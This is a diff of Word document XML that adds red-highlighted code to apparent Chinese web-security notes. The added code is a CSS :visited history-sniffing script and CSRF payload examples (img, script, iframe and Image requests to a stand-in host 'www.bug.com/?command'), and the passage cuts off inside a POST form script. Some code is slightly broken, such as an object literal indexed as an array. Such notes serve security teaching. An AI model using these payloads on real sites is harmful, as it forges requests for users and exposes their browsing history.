           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>明对象([object CSSStyleDeclaration])上的属性值</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ;    getProopertyValue(‘属性值’)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>&lt;ul id=”visited”&gt;&lt;/ul&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>&lt;ul id=”notVisited”&gt;&lt;/ul&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>&lt;script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>var website={</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>“www.qq.com”,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>“www.baidu.com”,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>“www.163.com”</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>};</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>for(var i=0;i&lt;website.length;i++){</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>var link=document.createElement(“a”);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>link.id=”id”+i;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>link.href=website[i];</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>link.innerHTML=website[i];</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>document.write(“&lt;style&gt;”);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>document.write(“#id”+i+”:visited{color:#FF0000}”);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>document.write(”&lt;/style&gt;”);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>document.body.appendChild(link);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>var color=document.defaultView.getComputedStyle(link,null).getPropertyValue(“color”);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>document.body.removeChild(link);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>var item=document.createElement(“li”);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>item.appendChild(link);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>if(color==”rgb(255,0,0)”){</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="840" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>document.getElementById(‘visited’).appendChild(item);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>}else{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="840" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>document.getElementById(‘notVisited’).appendChild(item);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>七．CSRF(Cross-Site Request Forgery)跨站点请求伪造</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>CSRF攻击能劫持终端用户在已登录的web站点上执行非本意的操作，简单的说，攻击者透过盗用用户身份悄悄发送一个请求，或执行某些恶意操作，CSRF的过程非常隐秘，受害人甚至无法察觉</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>&lt;img src=”http://www.bug.com/?command”&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>&lt;script src=”http://www.bug.com/?command”&gt;&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>&lt;iframe src=”http://www.bug.com/?command”&gt;&lt;/iframe&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>&lt;script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>var foo=new Image();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>foo.src=”http://www.bug.com/?command”;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>&lt;script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>var post_data=”name=value”;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
